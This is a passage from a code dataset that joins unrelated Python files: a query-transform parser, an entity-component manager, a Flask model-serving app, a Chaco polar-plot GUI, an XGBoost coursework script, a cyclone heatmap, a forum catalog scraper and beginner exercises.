Project.parse(_dict)\n if typ == Transform.Type.FILTER:\n return Filter.parse(_dict)\n if typ == Transform.Type.ORDER_BY:\n return OrderBy.parse(_dict)\n if typ == Transform.Type.LIMIT:\n return Limit.parse(_dict)\n if typ == Transform.Type.AGGREGATE:\n return Aggregate.parse(_dict)\n if typ == Transform.Type.JOIN:\n return 
Join.parse(_dict)\n\n\nclass Project(Transform):\n    def __init__(self, stream, fields, merge=False, **kwargs):\n        self.type = Transform.Type.PROJECT\n        self.stream = stream\n        self.fields = fields\n        self.merge = merge\n        super(Project, self).__init__(**kwargs)\n\n    @classmethod\n    def parse(self, _dict, **kwargs):\n        _dict['fields'] = map(Value.parse, _dict['fields'])\n        return Project(**_dict)\n\n\nclass Filter(Transform):\n    def __init__(self, stream, condition, **kwargs):\n        self.type = Transform.Type.FILTER\n        self.stream = stream\n        self.condition = condition\n        super(Filter, self).__init__(**kwargs)\n\n    @classmethod\n    def parse(self, _dict):\n        _dict['condition'] = Condition.parse(_dict['condition'])\n        return Filter(**_dict)\n\n\nclass OrderBy(Transform):\n    def __init__(self, stream, fields, reverse=False, **kwargs):\n        self.type = Transform.Type.ORDER_BY\n        self.stream = stream\n        self.fields = fields\n        self.reverse = reverse\n        super(OrderBy, self).__init__(**kwargs)\n\n    @classmethod\n    def parse(self, _dict):\n        _dict['fields'] = map(Value.parse, _dict['fields'])\n        return OrderBy(**_dict)\n\n\nclass Limit(Transform):\n    def __init__(self, stream, limit, **kwargs):\n        self.type = Transform.Type.LIMIT\n        self.stream = stream\n        self.limit = limit\n        super(Limit, self).__init__(**kwargs)\n\n    @classmethod\n    def parse(self, _dict):\n        return Limit(**_dict)\n\n\nclass Aggregate(Transform):\n    def __init__(self, stream, group_by, aggregates, **kwargs):\n        self.type = Transform.Type.AGGREGATE\n        self.stream = stream\n        self.aggregates = aggregates\n        self.group_by = group_by\n        super(Aggregate, self).__init__(**kwargs)\n    \n    @classmethod\n    def parse(self, _dict):\n        _dict['aggregates'] = map(Aggregator.parse, _dict['aggregates'])\n        _dict['group_by'] = GroupBy.parse(_dict['group_by'])\n        return Aggregate(**_dict)\n\n\nclass Join(Transform):\n    def __init__(self, left, right, condition, **kwargs):\n        self.type = Transform.Type.JOIN\n        self.left = left\n        self.right = right\n        self.condition = condition\n        super(Join, self).__init__(**kwargs)\n\n    @classmethod\n    def parse(self, _dict):\n        _dict['left'] = _parse_stream_or_transform(_dict['left'])\n        _dict['right'] = _parse_stream_or_transform(_dict['right'])\n        _dict['condition'] = Condition.parse(_dict['condition'])\n        return Join(**_dict)\n","sub_path":"metis/metis/core/query/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"236860621","text":"\nalgorithm = int(input(\"Choose the algorithm you want the classification to use: press '1' for the bayes algorithm\"))\nif algorithm == 1:\n    print(\"1\")\nelif algorithm == 2:\n    print(\"2\")\nelif algorithm == 3:\n    print(\"3\")\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"81722679","text":"\n'''\nCreated on 2013-11-02\n\n@author: Nich\n'''\n\n\n#from objects.components import components\n\n\n#from room.room_components import room_components\n\n#all_components = {}\n# all_components.update(components)\n# all_components.update(room_components)\n\n\n\nclass ArrayComponentSource():\n\n    def __init__(self, component_list):\n        self.component_list = component_list\n        self.component_object = {}\n\n        for comp_name in component_list.keys():\n            self.component_object[comp_name] = {}\n\n    def get_component(self, entity_id, component_name):\n        if self.has_entity(component_name, 
entity_id):\n return self.component_object[component_name][entity_id]\n else:\n raise AttributeError(\n \"{0} has no component named {1}\".format(entity_id, component_name))\n\n def get_supported_subset(self, component_list):\n return list(filter(self.has, component_list))\n\n def remove_component(self, entity_id, component_name):\n if self.has_entity(component_name, entity_id):\n self.component_object[component_name].pop(entity_id)\n\n def remove_all_components(self, entity_id):\n for comp in self.component_list:\n self.remove_component(entity_id, comp)\n\n def has(self, component_name):\n return component_name in self.component_list\n\n def get_entities_for_component(self, component_name):\n return list(self.component_object[component_name].keys())\n\n def create_component_data(self, component_name, entity_id, data):\n component = self.component_list[component_name]\n if data is None:\n self.component_object[component_name][\n entity_id] = component(entity_id)\n else:\n self.component_object[component_name][\n entity_id] = component(entity_id, **data)\n\n def has_entity(self, component_name, entity_id):\n return self.has(component_name) and entity_id in self.component_object[component_name]\n\n def add_component_to_object(self, component_name, entity_id, data):\n if not self.has_entity(component_name, entity_id):\n self.create_component_data(component_name, entity_id, data)\n # object.components.add(component_name)\n else:\n raise AttributeError(\n \"Can't add a component more than once to the same object\")\n\n def get_entities_with_components(self, component_list, entity_ids=None):\n entities = [] if entity_ids == None else [entity_ids]\n for component_name in component_list:\n entities.append(self.get_entities_for_component(component_name))\n\n if len(entities) == 0:\n return []\n\n e_list = set(entities[0])\n for e in entities[1:]:\n e_list = e_list.intersection(set(e))\n\n return e_list\n\n def get_component_for_entities(self, entity_ids, component_name):\n components = []\n for e_id in entity_ids:\n\n if self.has_entity(component_name, e_id):\n\n components.append(self.component_object[component_name][e_id])\n\n return components\n\n def create_entity(self):\n return Entity()\n\n\nclass ComponentManager(object):\n\n def __init__(self, component_sources=None):\n self.component_sources = component_sources\n\n def get_component(self, entity_id, component_name):\n for component_source in self.component_sources:\n if component_source.has(component_name):\n return component_source.get_component(entity_id, component_name)\n\n def entity_has_component(self, entity_id, component_name):\n return any([s.has_entity(component_name, entity_id) for s in self.component_sources])\n\n def has_component(self, component_name):\n return any([cs.has(component_name) for cs in self.component_sources])\n\n def remove_component(self, component_name, entity_id):\n for component_source in self.component_sources:\n if component_source.has(component_name):\n component_source.remove_component(entity_id, component_name)\n break\n else:\n raise AttributeError(\"Component not found\")\n\n def remove_all_components(self, entity_id):\n for component_source in self.component_sources:\n component_source.remove_all_components(entity_id)\n\n def add_component_to_object(self, component_name, entity_id, data=None):\n for component_source in self.component_sources:\n if component_source.has(component_name):\n component_source.add_component_to_object(\n component_name, entity_id, data)\n break\n else:\n raise 
AttributeError(component_name + \" was not found in sources\")\n\n def create_entity(self, entity_spec):\n\n entity = self.component_sources[0].create_entity()\n\n for component_name, component_data in entity_spec.items():\n self.add_component_to_object(\n component_name, entity.id, component_data)\n\n return entity\n\n def get_entities_for_component(self, component_name):\n entities = []\n for component_source in self.component_sources:\n if component_source.has(component_name):\n entities = component_source.get_entities_for_component(\n component_name)\n break\n return entities\n\n def get_entities_with_components(self, component_list, entity_ids):\n entities_from_sources = []\n components_covered = []\n num_components_from_source = []\n\n for component_source in self.component_sources:\n supported_components = component_source.get_supported_subset(\n component_list)\n entities_from_sources.append(\n component_source.get_entities_with_components(supported_components, entity_ids=entity_ids))\n components_covered += supported_components\n num_components_from_source.append(len(supported_components))\n\n if sorted(components_covered) != sorted(component_list):\n raise AttributeError(\"One or more components not found in one of the lists. Got: \" +\n str(components_covered) + \" Expected: \" + str(component_list))\n\n # If a source doesn't provide any entities, don't count that as empty when considering if entities should be returned\n # To do that, filter them from the lists of sources (those sources\n # should return 0 entities regardless)\n entities_from_sources = [\n es for i, es in enumerate(entities_from_sources) if num_components_from_source[i] > 0]\n\n entities = entities_from_sources[0]\n for entity_list in entities_from_sources[1:]:\n if entity_list != []:\n entities = list(set(entities).intersection(set(entity_list)))\n\n return entities\n\n def get_components_for_entities(self, entity_ids, component_name):\n components = []\n for component_source in self.component_sources:\n if component_source.has(component_name):\n components += component_source.get_component_for_entities(\n entity_ids, component_name)\n\n return components\n","sub_path":"Engine/components/component_manager.py","file_name":"component_manager.py","file_ext":"py","file_size_in_byte":7224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"244386223","text":"import os\n\nwith open(\"file_name_list.txt\",\"w\") as f:\n\tfor curdir, dirs, files in os.walk('./gachon_python_class'):\n\t\tf.write(\"Current Directory :\" + curdir + \"\\n\")\n\n\t\tif len(dirs):\n\t\t\tf.write(\"Directory List\" + \"\\n\")\n\t\t\tdirlist = \"\"\n\t\t\tfor dir in dirs:\n\t\t\t\tdirlist = dirlist + dir + \"\\t\" + str(len(files)) + \"\\n\"\n\t\t\tf.write(dirlist+\"\\n\")\n\n\t\tif len(files):\n\t\t\tf.write(\"File List List\" + \"\\n\")\n\t\t\tfilelist = \"\"\n\t\t\tfor file in files:\n\t\t\t\tfilelist = filelist + file + \"\\t\" + str(os.path.getsize (curdir+\"/\"+file))+\"KB\" + \"\\n\"\n\t\t\tf.write(filelist+\"\\n\")\n\n\t\tf.write((\"-\"*60)+\"\\n\")\n","sub_path":"lecture/w11_files/write_file.py","file_name":"write_file.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"74731631","text":"from flask import Flask, request, render_template\r\nimport pickle\r\nimport numpy as np\r\n\r\napp = Flask(__name__)\r\nmodel = pickle.load(open('oscar_pred.pkl', 'rb'))\r\n\r\n@app.route('/')\r\ndef 
home():\r\n return render_template('index.html')\r\n\r\n@app.route('/predict', methods=['POST'])\r\ndef predict():\r\n\r\n init_features = [float(x) for x in request.form.values()]\r\n final_features = [np.array(init_features)]\r\n\r\n prediction = model.predict(final_features)\r\n\r\n return render_template('index.html', prediction_text='Prediction: {}'.format(prediction))\r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0', port=4000, debug=True)\r\n\r\n ","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"172696293","text":"from numpy import array,linspace, pi, arange, sin, cos, ones, frompyfunc, where, hstack\nfrom enthought.chaco.api import create_polar_plot\nfrom enthought.enable.example_support import DemoFrame, demo_main\n\n# Enthought library imports\nfrom enthought.enable.api import Window\nfrom enthought.traits.api import false\nfrom enthought.traits.api import Delegate\nfrom enthought.traits.api import Array, Bool, Callable, Enum, Float, HasTraits, \\\n Instance, Int, Trait, ToolbarButton, Button, on_trait_change, \\\n Property, cached_property, Range, Instance, List\nfrom enthought.traits.ui.api import *\n\nfrom enthought.traits.ui.menu import NoButtons, OKButton, CancelButton, Action, CloseAction, Menu, \\\n MenuBar, Separator\nfrom enthought.enable.component_editor import ComponentEditor\nfrom enthought.chaco.example_support import DemoFrame, demo_main, COLOR_PALETTE\nfrom enthought.chaco.api import HPlotContainer, create_line_plot, add_default_axes, \\\n add_default_grids, OverlayPlotContainer, \\\n PlotLabel, VPlotContainer, \\\n create_scatter_plot, Legend, PlotComponent\nfrom enthought.chaco.tools.api import PanTool, RectZoomTool, SimpleZoom, \\\n LegendTool, TraitsTool, DragZoom\nfrom mfn_polar_editor import MFnPolarPlotItem\nimport enthought.units as units\nfrom enthought.units.angle import degree, radian\n\nimport time, sys\nimport math\n \n# function to be plotted\ndef radius_fn( theta, alpha, delta_alpha, delta_trans, strech_residual, strech_quasibrittle):\n \n #1st quadrant\n if ((theta-alpha) >= 0. and (theta-alpha) <= (pi/2)):\n theta_tilde = theta-alpha \n #2nd quadrant \n elif ((theta-alpha) <= pi and (theta-alpha) >= pi/2):\n theta_tilde = pi-(theta-alpha) \n #3rd quadrant positive\n elif ((theta-alpha) >= pi and (theta-alpha) <= 3*pi/2):\n theta_tilde = theta-alpha-pi\n #3rd quadrant negative \n elif ((theta-alpha) >= -pi and (theta-alpha) <= -pi/2):\n theta_tilde = theta-alpha+pi\n #4th quadrant positive\n elif ((theta-alpha) <= 2*pi and (theta-alpha) >= 3*pi/2):\n theta_tilde = (2*pi)-(theta-alpha)\n #4th quadrant negative \n elif ((theta-alpha) <= 0. 
and (theta-alpha) >= -pi/2):\n theta_tilde = -(theta-alpha)\n\n ### Definition of function to be plotted in the range of 0 and Pi/2:\n phi_residual = 0.65\n phi_quasibrittle = - 0.25\n _phi_residual = phi_residual + (1-phi_residual) * strech_residual\n _phi_quasibrittle = phi_quasibrittle + (1-phi_quasibrittle) * strech_quasibrittle\n \n # constant values with linear transition function:\n # (for delta_alpha = 0 the transition function is evaluated)\n if abs(theta_tilde) < delta_alpha:\n radius_fn = _phi_residual \n elif abs(theta_tilde) >= delta_alpha and abs(theta_tilde) < delta_alpha+delta_trans:\n radius_fn = (_phi_residual - \\\n ((theta_tilde-delta_alpha)*(_phi_residual - _phi_quasibrittle)/(delta_trans)))\n else:\n radius_fn = _phi_quasibrittle\n \n return radius_fn\n\nvradius_fn = frompyfunc( radius_fn, 6, 1 )\n\nclass MFnWTHandler( Handler ):\n def open_data( self, info ):\n sys.exit(0)\n #info.object.print_data()\n# dlg = FileDialog(parent=self.control, wildcard=\"*.jpg\")\n\n# if dlg.open() == OK:\n# self._editor.path = dlg.path\n\n \n def save_file(self,info):\n sys.exit(0)\n # if self.control:\n# try:\n# self._editor.save()\n# except IOError, e:\n# # If you are trying to save to a file that doesn't exist,\n# # open up a FileDialog with a 'save as' action.\n# dlg = FileDialog(parent=self.control, action='save as', wildcard=\"*.jpg\")\n# if dlg.open() == OK:\n# self._editor.save(dlg.path)\n\n\n def exit_file(self,info):\n sys.exit(0)\n\n def init_file(self, window):\n \"\"\" Creates a new action. \"\"\"\n# self._window = window\n# self.name = \"E&xit\"\n self.menu_bar_manager = MenuBarManager(MenuManager(\n Action(name='&Open...', on_perform=self._open_file),\n Action(name='&Save', on_perform=self._save_file),\n Action(name='E&xit', on_perform=self.close),\n name='&File'))\n\n\n def perform(self):\n \"\"\" Performs the action. 
\"\"\"\n self._window.close()\n\nclass MFnPolar(HasTraits):\n\n numpoints = Int(80)\n low = Float(0.)\n high = Float(2*pi)\n\n alpha = Range( 0., pi , 0., auto_set = False)\n delta_alpha = Range( 0., pi/2, 0., auto_set = False)\n delta_trans = Range( 0., pi , 0., auto_set = False)\n plotrange_min = Float( 0.)\n plotrange_max = Float( 1.)\n frac_noplot = Range( 0., 1 , 0.3, auto_set = False)\n strech_residual = Range( 0., 1 , 0., auto_set = False)\n strech_quasibrittle = Range( 0., 1 , 0., auto_set = False)\n\n eparams = [\"alpha\", \"delta_alpha\", \"delta_trans\", \"plotrange_min\", \"plotrange_max\",\\\n \"frac_noplot\", \"strech_residual\",\"strech_quasibrittle\" ] \n\n theta = Array\n def _theta_default(self):\n # add the first value (theta=zero) to the end of theta-array\n theta_zero = array([0])\n theta_arr = arange(self.low, self.high, (self.high-self.low) / self.numpoints) \n return hstack([theta_arr,theta_zero])\n \n radius = Property( Array, depends_on = 'theta,alpha,delta_alpha,delta_trans,frac_noplot,strech_residual,strech_quasibrittle ' )\n @cached_property\n def _get_radius(self):\n return array( vradius_fn( self.theta, self.alpha, self.delta_alpha, self.delta_trans, self.strech_residual, \\\n self.strech_quasibrittle ), dtype='float_' )\n\n def __call__(self, theta):\n # get theta array without the last value (theta=0)\n theta_nozero = self.theta[0:-1]\n # get the index of the last value in theta_nozero which is smaller than theta\n idx = len( theta_nozero[ where( theta_nozero < theta ) ] ) - 1\n # dtheta - differenz between the current theta value and the last value in \n # theta_nozero smaller than thetageo_type_grid\n if theta == 0:\n theta = 2*pi\n dtheta = theta - theta_nozero[ idx ]\n # delta_theta - differenz between the last value in theta_nonzero smaller than \n # theta and the first value in theat_nonzero greater than theta\n delta_theta = theta_nozero[1]\n result = self.radius[idx] + (( self.radius[ idx+1 ] - self.radius[ idx ] ) / delta_theta) * dtheta\n return result\n\n plot_type = Enum('polar')\n \n radiusplot = MFnPolarPlotItem(\"theta\", [\"radius\", \"plotrange_min\", \"plotrange_max\", \"frac_noplot\"],\n type_trait=\"plot_type\",\n \n # Basic axis and label properties\n show_label=False,\n resizable=True,\n orientation=\"h\",\n x_label = \"Index data\",\n y_label = \"Value data\",\n \n # Plot properties\n color = \"green\",\n bgcolor = \"lightyellow\",\n \n # Specific to scatter plot\n marker = \"circle\",\n marker_size = 2,\n outline_color = \"none\",\n \n # Border, padding properties\n border_visible=True,\n border_width=1,\n padding_bg_color = \"lightgray\")\n\n radius_min = Property( Float, depends_on = 'current_theta,alpha,delta_alpha,delta_trans, strech_residual,strech_quasibrittle' )\n @cached_property\n def _get_radius_min(self):\n r_min = self.radius.min()\n return r_min\n\n radius_max = Property( Float, depends_on = 'current_theta,alpha,delta_alpha,delta_trans, strech_residual,strech_quasibrittle' )\n @cached_property\n def _get_radius_max(self):\n r_max = self.radius.max()\n return r_max\n\n current_theta = Float( 0.0 )\n\n current_radius = Property( Float, depends_on = 'current_theta,alpha,delta_alpha,delta_trans,strech_residual,strech_quasibrittle' )\n @cached_property\n def _get_current_radius(self):\n return self.__call__( self.current_theta )\n \n traits_view = View(HSplit(\n Group(\n Tabbed( \n Item(\"alpha\"),\n Item(\"delta_alpha\"),\n Item(\"delta_trans\"),\n Item(\"strech_residual\"),\n Item(\"strech_quasibrittle\"),\n 
Item(\"plotrange_min\"),\n Item(\"plotrange_max\"),\n Item(\"frac_noplot\"),\n ),\n ),\n ),\n radiusplot,\n HSplit(Group(\n Tabbed( \n Item('current_theta'),\n Item('current_radius', style = 'readonly' ),\n Item('radius_min', style = 'readonly' ),\n Item('radius_max', style = 'readonly' ),\n dock = 'horizontal',\n ),\n ),\n ),\n buttons= [OKButton,CancelButton],\n menubar=MenuBar(Menu(Action(name=\"O&pen..\", action=\"open_data\"),\n Action(name=\"S&ave..\", action=\"save_file\"),\n Action(name=\"E&xit\", action=\"exit_file\"),\n name = 'File')),\n \n handler = MFnWTHandler,\n resizable=True,\n width=700, height=800)\n \nif __name__ == '__main__': \n mp = MFnPolar()\n mp.configure_traits()\n","sub_path":"scratch/KRAMS/src/apps/scratch/faezeh/latex_engine/latex_polar_engine/mfn_polar.py","file_name":"mfn_polar.py","file_ext":"py","file_size_in_byte":10821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"240880330","text":"### GT ID: cchen376\n### Assignment #1 CS7641 Fall 2019\n\n#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport seaborn as sns\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score\nfrom sklearn.model_selection import GridSearchCV\nimport matplotlib.pyplot as plt\nimport xgboost as xgb\nfrom sklearn.model_selection import learning_curve\nfrom helperfuncs import * \n\n\n# # Data Preprocessing (scaling and splitting)\n\n# In[2]:\nseed=0\n\ndf_egrid = pd.read_csv('Data_for_UCI_named.csv')\ndf_egrid['stabf']=np.where(df_egrid['stabf']=='unstable',0,1)\ny_egrid=df_egrid['stabf']\nX_egrid=df_egrid.drop(['stabf','stab'],axis=1)\n\ndf_def = pd.read_csv('default_data_cleaned.csv')\ny_def=df_def['default payment next month']\nX_def=df_def.drop(['default payment next month','ID'],axis=1)\n\nX_def_s=StandardScaler().fit_transform(X_def)\nX_egrid_s=StandardScaler().fit_transform(X_egrid)\n\nX_train_egrid, X_test_egrid, y_train_egrid, y_test_egrid= train_test_split(X_egrid_s,y_egrid,test_size=.3,random_state=seed,stratify=y_egrid)\nX_train_def, X_test_def, y_train_def, y_test_def= train_test_split(X_def_s,y_def,test_size=.3,random_state=seed,stratify=y_def)\n\n\n# # Grid Search\n\n# In[34]:\n\n\nxgb_params= {'max_depth':[2,3,5,10],'learning_rate':[.05,.1,.2]}\n\n\n# In[35]:\n\n\nbest_params_egrid,df_cv_egrid,clf_cv_egrid=clfGridSearch(xgb.XGBClassifier(random_state=seed),params=xgb_params,\n X=X_train_egrid,y=y_train_egrid,cv=3,scoring='f1',\n name='electrical',clf_type='XGB',seed=seed)\n\nbest_params_def,df_cv_def,clf_cv_def=clfGridSearch(xgb.XGBClassifier(random_state=seed),params=xgb_params,\n X=X_train_def,y=y_train_def,cv=3,scoring='f1',\n name='default',clf_type='XGB',seed=seed)\n\n\n# # Grid Search Results and plots\nplt.figure()\n\ncolors=['r','b','g']\nfor idx,(label, grp) in enumerate(df_cv_egrid.groupby('param_learning_rate')):\n plt.plot(grp['param_max_depth'],grp['mean_test_score'],c=colors[idx],linestyle='-')\n plt.plot(grp['param_max_depth'],grp['mean_train_score'],c=colors[idx],linestyle='--')\nplt.xlabel('max depth')\nplt.ylabel('f1 score')\nplt.grid()\nplt.title('electrical - SVC gridsearch results (CV)')\nplt.legend(['.05 learning rate - test_f1','.05 learning rate - train_f1','.1 learning rate - 
test_f1','.1 learning rate - train_f1','.2 learning rate - test_f1','.2 learning rate - train_f1'])\nplt.savefig('parameter_tuning_electrical_XGB.png')\n\n\n# In[39]:\ndf_cv_def[['param_learning_rate','param_max_depth','mean_test_score']]\n\n# In[40]:\nplt.figure()\n\nfor idx,(label, grp) in enumerate(df_cv_def.groupby('param_learning_rate')):\n plt.plot(grp['param_max_depth'],grp['mean_test_score'],c=colors[idx],linestyle='-')\n plt.plot(grp['param_max_depth'],grp['mean_train_score'],c=colors[idx],linestyle='--')\nplt.xlabel('max depth')\nplt.ylabel('f1 score')\nplt.grid()\nplt.title('default - SVC gridsearch results (CV)')\nplt.legend(['.05 learning rate - test_f1','.05 learning rate - train_f1','.1 learning rate - test_f1','.1 learning rate - train_f1','.2 learning rate - test_f1','.2 learning rate - train_f1'])\nplt.savefig('parameter_tuning_default_XGB.png')\n\n\n# # Obtain testing results and metrics from best classifiers\n\n# In[3]:\nclf_egrid=xgb.XGBClassifier(learning_rate = .2, max_depth=5,random_state=seed)\nclf_def=xgb.XGBClassifier(learning_rate = .05, max_depth=3,random_state=seed)\ntrain_sizes=np.linspace(.05,.9,7)\n\n\n# ## Generate timing curve\n\n# In[14]:\nimport time\ntime_egrid_list=[]\nnum_estimators_egrid=[]\ntime_def_list=[]\nnum_estimators_def=[]\n\nfor split in train_sizes:\n X_train_egrid_temp,X_test_egrid_temp,y_train_egrid_temp,y_test_egrid_temp=train_test_split(X_egrid_s,y_egrid,train_size=split,random_state=seed)\n X_train_def_temp,X_test_def_temp,y_train_def_temp,y_test_def_temp=train_test_split(X_def_s,y_def,train_size=split,random_state=seed)\n\n start_egrid =time.time()\n clf_egrid.fit(X_train_egrid_temp,y_train_egrid_temp)\n time_egrid = time.time()-start_egrid\n\n start_def =time.time()\n clf_def.fit(X_train_def_temp,y_train_def_temp)\n time_def = time.time()-start_def\n\n time_egrid_list.append(time_egrid)\n num_estimators_egrid.append(clf_egrid.n_estimators)\n time_def_list.append(time_def)\n num_estimators_def.append(clf_def.n_estimators)\n\n\n# In[27]:\nfig, ax1 = plt.subplots()\nax1.plot(train_sizes*10000,time_egrid_list)\nax1.set_title('Timing Curve - Electrical - XGBoost')\nax2 = ax1.twinx()\nax2.plot(train_sizes*10000,np.array(time_egrid_list)/np.array(num_estimators_egrid))\nax1.set_xlabel('training size')\nax1.set_ylabel('total train time')\nax2.set_ylabel('train time per tree')\n\n\n# In[28]:\nfig, ax1 = plt.subplots()\nax1.plot(train_sizes*10000,time_def_list)\nax1.set_title('Timing Curve - Default - XGBoost')\nax2 = ax1.twinx()\nax2.plot(train_sizes*10000,np.array(time_def_list)/np.array(num_estimators_def))\nax1.set_xlabel('training size')\nax1.set_ylabel('total train time')\nax2.set_ylabel('train time per tree')\n\n\n# In[10]:\nplot_learning_curve(clf_egrid,\n 'learning curve XGB Electrical(5foldCV)',\n X_egrid_s,y_egrid,cv=5,train_sizes=train_sizes,seed=seed)\n\n\n# In[46]:\nax1=plot_learning_curve(clf_def,\n 'learning curve XGB Default(5foldCV)',\n X_def_s,y_def,cv=5,train_sizes=train_sizes,seed=seed)\n\n\n# In[6]:\ny_pred_egrid=clf_egrid.predict(X_test_egrid)\n\nprint(classification_report(y_test_egrid,y_pred_egrid))\n\nprint(confusion_matrix(y_test_egrid,y_pred_egrid))\nplot_roc_curve(y_test_egrid,y_pred_egrid,'ROC Curve for XGB Electrical')\n\n\n# In[4]:\ny_pred_def=clf_def.predict(X_test_def)\n\nprint(classification_report(y_test_def,y_pred_def))\nprint(confusion_matrix(y_test_def,y_pred_def))\nplot_roc_curve(y_test_def,y_pred_def,'ROC Curve for XGB Default')\n\n\n# In[8]:\nfrom imblearn.over_sampling import RandomOverSampler\nros = 
RandomOverSampler(random_state=seed)\nX_train_egrid_re, y_train_egrid_re = ros.fit_resample(X_train_egrid,y_train_egrid)\n\nclf_egrid.fit(X_train_egrid_re,y_train_egrid_re)\ny_pred_egrid=clf_egrid.predict(X_test_egrid)\n\nprint(classification_report(y_test_egrid,y_pred_egrid))\n\nprint(confusion_matrix(y_test_egrid,y_pred_egrid))\nplot_roc_curve(y_test_egrid,y_pred_egrid,'ROC Curve for XGB Electrical')\n\n\n# In[9]:\nX_def_re, y_def_re = ros.fit_resample(X_def_s,y_def)\nX_train_defr,X_test_defr,y_train_defr,y_test_defr=train_test_split(X_def_re,y_def_re,test_size=.3,random_state=0)\n\n\n# In[10]:\ny_pred_def=clf_def.predict(X_test_defr)\n\nprint(classification_report(y_test_defr,y_pred_def))\nprint(confusion_matrix(y_test_defr,y_pred_def))\nplot_roc_curve(y_test_defr,y_pred_def,'ROC Curve for XGB Over-sampling Default')\n\n\n\n\n\n\n","sub_path":"Boosting.py","file_name":"Boosting.py","file_ext":"py","file_size_in_byte":7080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"378884155","text":"\"\"\"\r\nCOMP7230 2018 Assignment 1\r\n\r\nOnce you have completed questions 1, 2, 3 and 7, running this file\r\nwill produce the heatmap.\r\n\r\nYou do not need to modify the contents of this file.\r\n\"\"\"\r\n\r\nimport scipy.ndimage as ndimage\r\nimport matplotlib\r\nfrom COMP7230_Assignment_1_Submission import *\r\n\r\n\r\ndef main():\r\n\r\n # Get the data set\r\n data_set = read_data_set(\"Cyclones.csv\")\r\n\r\n # Parse it into the required format\r\n for index, record in enumerate(data_set):\r\n data_set[index] = parse_record(record)\r\n\r\n # produce the data for the heat map\r\n heatmap = generate_heat_map(data_set)\r\n\r\n # read the map\r\n map_image = ndimage.imread(\"Australia_Map.jpg\")\r\n greymap = matplotlib.colors.rgb_to_hsv(map_image)[:, :, 2]\r\n\r\n # rescale the heatmap\r\n zoom = (np.shape(greymap)[0] / np.shape(heatmap)[0], np.shape(greymap)[1] / np.shape(heatmap)[1])\r\n heatmap = ndimage.interpolation.zoom(heatmap, zoom)\r\n heatmap -= np.amin(heatmap)\r\n heatmap /= np.amax(heatmap)\r\n\r\n print(np.amax(heatmap), np.amin(heatmap))\r\n\r\n # merge the heat map with the map of Australia and show\r\n red = np.uint8(greymap / 2 + 127 * heatmap)\r\n blue = np.uint8(greymap / 2)\r\n green = np.uint8(greymap / 2 + 127 - 127 * heatmap)\r\n\r\n rgb = np.dstack((red, green, blue))\r\n\r\n plt.clf()\r\n plt.imshow(rgb)\r\n plt.show()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"COMP7230_Assignment_1_Heatmap.py","file_name":"COMP7230_Assignment_1_Heatmap.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"239089283","text":"import re\nimport json\nimport requests\n\ndata = requests.get(\"http://boards.4chan.org/g/catalog\").text\nmatch = re.match(\".*var catalog = (?P\\{.*\\});.*\", data)\n\nif not match:\n print(\"Couldn't scrape catalog\")\n exit(1)\n\ncatalog = json.loads(match.group('catalog'))\n\nrunning = True\nwhile running:\n try:\n filtertext = input(\"filter: \")\n for number, thread in catalog['threads'].items():\n sub, teaser = thread['sub'], thread['teaser']\n if filtertext in sub.lower() or filtertext in teaser.lower():\n print(teaser)\n\n except KeyboardInterrupt:\n running = False","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} 
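In the catalog scraper above, re.match with a greedy \".*\" prefix only succeeds if the payload sits on the first line, because '.' does not cross newlines by default; a hedged sketch of a more robust form using re.search with re.DOTALL and a non-greedy body (the sample page string here is invented for illustration):

import re
import json

page = 'junk before\nvar catalog = {"threads": {}};\njunk after'
# Non-greedy body stops at the first '};', DOTALL lets '.' span newlines.
match = re.search(r"var catalog = (?P<catalog>\{.*?\});", page, re.DOTALL)
if match:
    catalog = json.loads(match.group("catalog"))
    print(catalog)  # {'threads': {}}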
+{"seq_id":"562936466","text":"import math\r\ndef main():\r\n\r\n def circle():\r\n radius = float(input('The radius of this circle is: '))\r\n perimeter = 2 * math.pi * radius\r\n print('The perimeter is %.2f' % perimeter)\r\n\r\n def number():\r\n a = 321\r\n b = 123\r\n print(a / b)\r\n print(a // b)\r\n print(a % b)\r\n print(a ** b)\r\n d = 'hell'\r\n e = \"0\" #只有使用特殊字符时才会有差别(\"与')\r\n a = int(input('a = '))\r\n b = int(input('b = '))\r\n print(type(d)) #使用type()对变量进行检查\r\n print(ord(e)) #使用ord()将字符串/一个字符转换成对应的编码\r\n print('%d + %d = %d' % (a, b, a + b))\r\n flag = not (1 != 2)\r\n print('flag = ', flag)\r\n print(flag is False) #False True 注意首字母大写\r\n\r\n def IsLeapYear():\r\n year = int(input('请输入年份: '))\r\n #如果代码太长写成一行不便于阅读 可以使用\\对代码进行折行\r\n is_leap = (year % 4 == 0 and year % 100 != 0) or \\\r\n year % 400 == 0\r\n print(is_leap)\r\n pass\r\nif __name__ == '__main__':\r\n #input() #在命令行窗口press enter关闭窗口\r\n 